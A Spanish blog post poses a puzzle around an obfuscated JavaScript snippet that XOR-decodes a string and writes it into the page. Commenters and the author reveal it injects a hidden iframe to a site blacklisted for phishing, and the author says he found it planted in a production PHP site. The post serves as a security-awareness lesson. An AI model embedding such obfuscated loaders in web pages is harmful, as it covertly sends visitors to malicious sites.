Reto: Descifra el codigo

Para seguir con la saga: “Retos on Geeks.ms

Quizás algunos ya hayan visto este código u otros lo descifren muy rápido, así que abstenerse en los comentarios para dar chance a los demás. Es un código en JavaScript, y la idea es tratar de saber que genera el document.write, sólo viendo el código, sin compilar o depurar usando algún editor.

   1: e = '0x00' + '19';
   2: str1 = "%A2%FA%F1%EC%86%EB%EA%E1%F2%FD%A5%B8%EC%F1%EB%F1%F8%F1%F2%F1%EA%E1" +
   3:        "%A0%FE%F1%FA%FA%FD%F4%B8%A4%A2%F1%FC%E8%F9%F5%FD%86%EB%E8%FB%A5%B8" +
   4:        "%FE%EA%EA%F6%A0%B7%B7%EA%F1%F6%F7%FB%F4%EA%B4%FB%F7%F5%B7%F2%FA%B7" +
   5:        "%F5%FD%F4%EA%B7%B8%86%EF%F1%FA%EA%FE%A5%A9%86%FE%FD%F1%FF%FE%EA%A5" + 
   6:        "%A9%A4%A2%B7%F1%FC%E8%F9%F5%FD%A4%A2%B7%FA%F1%EC%A4";
   7: str = tmp = '';
   8: for (i = 0; i < str1.length; i += 3) {
   9:     tmp = unescape(str1.slice(i, i + 3));
  10:     str = str + String.fromCharCode((tmp.charCodeAt(0) ^ e) - 127);
  11: }
  12: document.write(str);

En la noche, o quizás mañana voy a tratar de enviar de que trata este código.

P.D.: Para este reto, el premio es la satisfacción de ver lo que genera el código :D.

Saludos,

4 comentarios en “Reto: Descifra el codigo”

  1. P.D.: Para este reto, el premio es la satisfacción de ver lo que genera el código :D.

    …y de paso, creas un “iframe” (un marco) invisible (hidden) que te lleva a una página que está en la lista negra por phising! (quiero a mi firefox que me sacó de allí!)

    hay que ser cerdo!

  2. @Espinete, básicamente es lo que dice @Robert, generá codigo phising.

    Ese fue el código que encontré en una página de producción (web en Php), al final del html antes de cerrar el .

    El mensaje es: “Cuidado con los códigos extranios en tus páginas web”, y si es alguno que no es entendible, y que esta ofuscado para eso, con mucha más razón darle seguimiento para ver de que se trata.

    Saludos,

  3. No es phishing en sí, aunque dependiendo de lo que haga ese iframe podría considerarse.

    Y en sí es XSS, pero no se si puede ser considerado un ataque XSS porque no es generado por el input de ningún usuario, si no que estaba directamente en el contenido original del archivo.

    Saludos,

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *